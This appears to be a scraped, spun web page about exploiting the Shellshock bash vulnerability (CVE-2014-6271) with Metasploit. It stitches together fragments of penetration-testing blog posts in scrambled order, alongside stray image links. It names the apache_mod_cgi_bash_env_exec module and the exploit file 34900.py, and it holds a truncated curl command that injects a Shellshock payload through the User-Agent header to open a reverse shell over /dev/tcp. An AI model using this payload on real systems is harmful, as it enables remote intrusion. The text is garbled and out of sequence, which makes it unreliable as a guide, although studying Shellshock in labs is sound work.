![Metasploit shellshock](https://kumkoniak.com/102.jpg)
![metasploit shellshock metasploit shellshock](http://4.bp.blogspot.com/-QBAwMmXcriU/VDY_dxqTMkI/AAAAAAAAXaw/wgJOm8XEPoI/s1600/shellshock_metasploit_8.png)
From past experience, I have had good luck with the one called apache_mod_cgi_bash_env_exec, so we can load that with the use command: One way to search is by using the CVE number, which is a “dictionary of publicly known information security vulnerabilities and exposures.” Shellshock was assigned CVE 2014-6271, so lets search for that: With your Kali and Metasploit up and running, let’s use the search function to find exploits that might help us hack our target. However, I still recommend checking out the appropriate documentation to ensure you have Metasploit setup correctly before running it.Īlso, if you really want to know the ins and outs of Metasploit, definitely check out some of the free online training offerings, such as the excellent resources from the folks at Offensive Security, who also offer the fantastic (and maddening!) OSCP training which we have written about in the past. The good news is it comes built right into Kali so there’s very little configuration necessary. A quick Google search revealed many tools/techniques you can use to take advantage of this specific vulnerability, but I’m going to focus on a popular tool called Metasploit. Last month, we had reached a point where we discovered that our victim (reminder: I’m using this free virtual machine as my target) might be exploitable via the Shellshock vulnerability. Why? Because today is judgement day – we are going to do some actual hacking!Īre you pumped? Good. If you need some time to catch up, read the first and second parts of this series and get up to speed. Let’s made sure you’ve familiarized yourself with the context. I’m just beside myself with excitement about this topic! The classic examples I see in from searches are the remote test:Ĭurl -A "() /bin/bash -i >& /dev/tcp/192.168.90.Greetings and welcome back to the third chapter in our breathtaking, mind-blowing, life-changing discussion about penetration testing! Okay, that was maybe a bit hyperbolic. Stumbling upon this vulnerability recently, I paused to dig into it with the intention of getting a better understanding for manual exploitation.
![metasploit shellshock metasploit shellshock](https://www.yeahhub.com/wp-content/uploads/2019/08/upgradingshell1.png)
I seem to recall having an issue with one or both at some point and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.
![metasploit shellshock metasploit shellshock](https://didierstevens.files.wordpress.com/2017/08/20170814-113626.png)
I've come across this vulnerability a few times in the past and I've either used Metasploit or 34900.py ("Apache mod_cgi - 'Shellshock' Remote Command Injection") to get my shell. I realize I'm talking about a four year old vulnerability but it's one that still exists and it's a rabbit hole I wanted to jump into. The scanner comes back with: " Site appears vulnerable to the 'shellshock' vulnerability ()."
![Metasploit shellshock](https://kumkoniak.com/102.jpg)